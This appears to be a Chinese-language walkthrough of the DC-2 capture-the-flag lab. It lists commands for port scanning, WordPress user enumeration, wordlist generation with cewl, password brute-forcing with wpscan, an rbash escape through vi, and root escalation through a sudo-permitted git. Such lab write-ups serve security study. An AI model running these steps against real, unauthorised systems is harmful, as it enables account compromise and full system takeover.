信息收集
靶机IP192.168.3.127
查询目标所有开放的端口:
nmap -A -p1-65535 192.168.3.127
访问80,http服务端口
wordpress:
kali内置的有 WPScan 是针对于wordpress网站的攻击工具。
利用dirb进行一波敏感目录爆破
找到后台登陆网址
利用工具爬行,获取账户字典。
wpscan一款针对于wordpress的安全扫描工具。
wpscan --url http://dc-2 -e u
-e枚举
-u user 用户名
得到三个用户名 创建 user.txt 写入
Cewl是一款采用开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,然后可以用于密码破解
cewl http://xxx.com/ -w password.txt
-w 保存到
使用wpscan进行暴力破解
wpscan --url http://dc-2/ -P password.txt -U user.txt
拿到两对账户密码
看到flag但是无法cat 查看 有一个 rbash限制
什么是rbash?
受限制的外壳或 rbash
,顾名思义是一个类似于 bash, 但不同之处在于它有很多限制来避免用户采取某些操作。 它用于安全目的 bash,但具有额外的安全层来实施这些限制。
compgen -c //查看可以使用的指令
发现可以使用vi
通过vi得到flag3,flag4
显然最后一个flag在root权限中,需要提权
Sudo提权命令
sudo -l //查看可以使用sudo权限的命令
发现git可以直接以root权限运行
使用sudo提权中的git提权
sudo git help add //
回车后输入:
!/bin/bash
提权成功拿到root权限。